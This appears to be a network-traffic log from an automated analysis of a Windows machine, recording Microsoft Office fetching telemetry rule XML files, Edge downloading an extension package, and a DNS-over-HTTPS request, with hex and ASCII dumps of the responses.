Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e1dc95e-801e-007b-6ed5-33e7ab000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968j6t2phC1EWRcfe800000005pg00000000n6ym x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
48	192.168.2.5	49811	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 1c99e56d-601e-0097-76d5-33f33a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968nxc96hC1EWRspw800000005d0000000004ggt x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
49	192.168.2.5	49813	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: 602c134e-d01e-0049-04d5-33e7dc000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968psccphC1EWRuz9s00000005x0000000004ut1 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
50	192.168.2.5	49814	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 5fec14be-a01e-0021-75d5-33814c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968j6t2phC1EWRcfe800000005ng00000000qrau x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.5	49812	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:25 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:25 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: f5f8c6aa-e01e-0099-78d5-33da8a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230625Z-174f7845968vwdr7hC1EWRsh3w00000005mg000000003hfz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:25 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	49823	23.219.161.135	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	614	OUT	GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1731971181&P2=404&P3=2&P4=MRnAzoeSjEDyWQ6JAWZtX9RJphm9QCEFkw%2fcMNMhzLbx2eEOQSTB5KfHfWengWikXRyXdjU2JRd1HtStvPiLMA%3d%3d HTTP/1.1 Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com Connection: keep-alive MS-CV: /LrG3OwAtz/uKMwqeO/Iyo Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-11 23:06:26 UTC	1248	IN	HTTP/1.1 200 OK Content-Type: application/x-chrome-extension Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT Accept-Ranges: bytes ETag: "Gv3jDkaZdFLRHkoq2781zOehQE8=" Server: Microsoft-IIS/10.0 X-AspNetMvc-Version: 5.3 MS-CorrelationId: 66e6cd6f-05d4-40c1-a4f9-e4466ce3154e MS-RequestId: fd29807f-e93f-4e37-814d-57a534734737 MS-CV: LQ+pUGR5vrEHicHVHp/XsJ.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET X-Powered-By: ARR/3.0 X-Powered-By: ASP.NET Content-Length: 11185 Cache-Control: public, max-age=86400 Date: Mon, 11 Nov 2024 23:06:26 GMT Alt-Svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,h3-Q050=":443"; ma=93600,quic=":443"; ma=93600; v="46,43" Connection: close Akamai-Request-BC: [a=23.35.17.145,b=582277322,c=g,n=US_NJ_EDISON,o=20940],[c=c,n=US_NJ_SECAUCUS,o=20940] MSREGION: X-CCC: X-CID: 3 Akamai-GRN: 0.91112317.1731366386.22b4d8ca Access-Control-Max-Age: 86400 Access-Control-Allow-Credentials: true Access-Control-Expose-Headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC Access-Control-Allow-Headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session Access-Control-Allow-Methods: GET,POST,OPTIONS Access-Control-Allow-Origin: *
2024-11-11 23:06:26 UTC	11185	IN	Data Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20 Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.5	49824	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:26 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 78b03680-101e-000b-4bd5-335e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230626Z-174f7845968jrjrxhC1EWRmmrs00000005qg00000000eesv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:26 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.5	49825	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:26 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 186f8a49-401e-005b-46d5-339c0c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230626Z-174f78459685m244hC1EWRgp2c00000005h0000000001k8u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:26 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.5	49828	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:26 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 8377dffe-c01e-00a1-6ad5-337e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230626Z-174f7845968vwdr7hC1EWRsh3w00000005dg00000000u4ry x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:26 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.5	49826	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:26 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: 5eaa081d-f01e-0099-68d5-339171000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230626Z-174f7845968pf68xhC1EWRr4h800000005u000000000dqwu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:26 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
57	192.168.2.5	49827	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-11 23:06:26 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 11 Nov 2024 23:06:26 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 072c0228-901e-00ac-3ad5-33b69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241111T230626Z-174f7845968c2t8dhC1EWR8s20000000059g00000000exm0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-11 23:06:26 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	49830	172.64.41.3	443	7344	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-11 23:06:26 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
